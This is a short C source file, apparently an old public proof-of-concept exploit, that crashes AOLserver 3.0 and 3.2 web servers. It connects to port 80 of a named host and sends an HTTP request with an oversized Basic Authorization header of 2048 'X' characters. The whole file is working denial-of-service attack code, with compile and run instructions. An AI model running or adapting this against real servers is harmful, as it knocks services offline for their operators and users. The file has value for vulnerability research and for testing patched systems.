/*	AOLserver will crash when a long authorization string is passed to it.
	Tested on 3.0 and 3.2 but may work on other versions to 
	3.3.1 and 3.4 are not vulnerable
	
	gcc -o aolcrash aolcrash.c; ./aolchash host

	exty <grumb@techemail.com> 
*/

#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

main(int argc, char *argv[]) 
{
	int sockfd, i;
	char str[2098];
	struct hostent *he;
	struct sockaddr_in their_addr;
	printf("[X] aolcrash.c by external [X]\n");
	if (argc != 2) {
		printf("usage: %s <addr>\n", argv[0]);
		exit(1);
	}
	if((he=gethostbyname(argv[1])) == NULL) {
		herror("gethostbyname");
		exit(1);
	}
	strcpy(str, "GET / HTTP/1.0\nAuthorization: Basic ");
	for(i=0; i<2048; i++)
		strcat(str, "X");
	strcat(str, "\r\n\r\n");
	their_addr.sin_family = AF_INET;
	their_addr.sin_port = htons(80);
	their_addr.sin_addr = (*(struct in_addr *)he->h_addr);
	bzero(&their_addr.sin_zero, 8);
	if ((sockfd=socket(AF_INET, SOCK_STREAM, 0)) == -1) {
		perror("socket");
		exit(1);
	}
	if(connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) {
		perror("connect");
		exit(1);
	}
	if(send(sockfd, str, 2098, 0) == -1) {
		perror("send");
		exit(1);
	}
	printf("\nexploit string sent\n");
	close(sockfd);
}